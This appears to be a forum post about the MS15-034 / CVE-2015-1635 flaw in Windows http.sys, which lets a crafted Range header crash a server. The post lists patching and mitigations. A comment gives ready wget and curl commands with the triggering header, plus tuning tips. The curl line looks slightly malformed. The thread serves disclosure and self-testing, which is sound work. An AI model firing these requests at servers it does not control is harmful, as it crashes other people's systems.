Microsoft Web server critical vulnerability - remote BSoD

In a nutshell, there is a vulnerability in http.sys, the driver underlying IIS and any other service listening for HTTP on Windows (SSRS, IIS, etc). A manipulated Range header can cause the server to BSoD. Microsoft has released a patch.

If you are running a public facing web server on Server 2008R2 and up, you may be vulnerable to this.

Here is a screen grab where I BSoD'd this 2012R2 VM after a few tries of the command:
http://i.imgur.com/waJCVxi.jpg

Options to fix:
1. Patch
2. Disable kernel mode caching
3. Write and iRule to scrub out the Range header.

Reference material:
CVE-2015-1635 - RCE in Windows HTTP.sys : netsec
https://technet.microsoft.com/library/security/ms15-034

Find more posts tagged with

Comments

NotHackingYou

To try this yourself you can use wget or curl:

[FONT=arial]wg[COLOR=#000000]et[/COLOR] --header="Range: bytes=18-18446744073709551615" http://<yourserver>/<rangeable_resource>[/FONT]

[FONT=arial]cu[COLOR=#000000]rl[/COLOR] -v http://<yourserver>/<rangeable_resource> -H "Host: <host header>" -"Range: bytes=18-13466744073709551615"[/FONT]

a rangeable resource is usually something like an image or audio file. Around 100k seems to work well. Too large and the resource will duck the cache, too small and it won't be cached.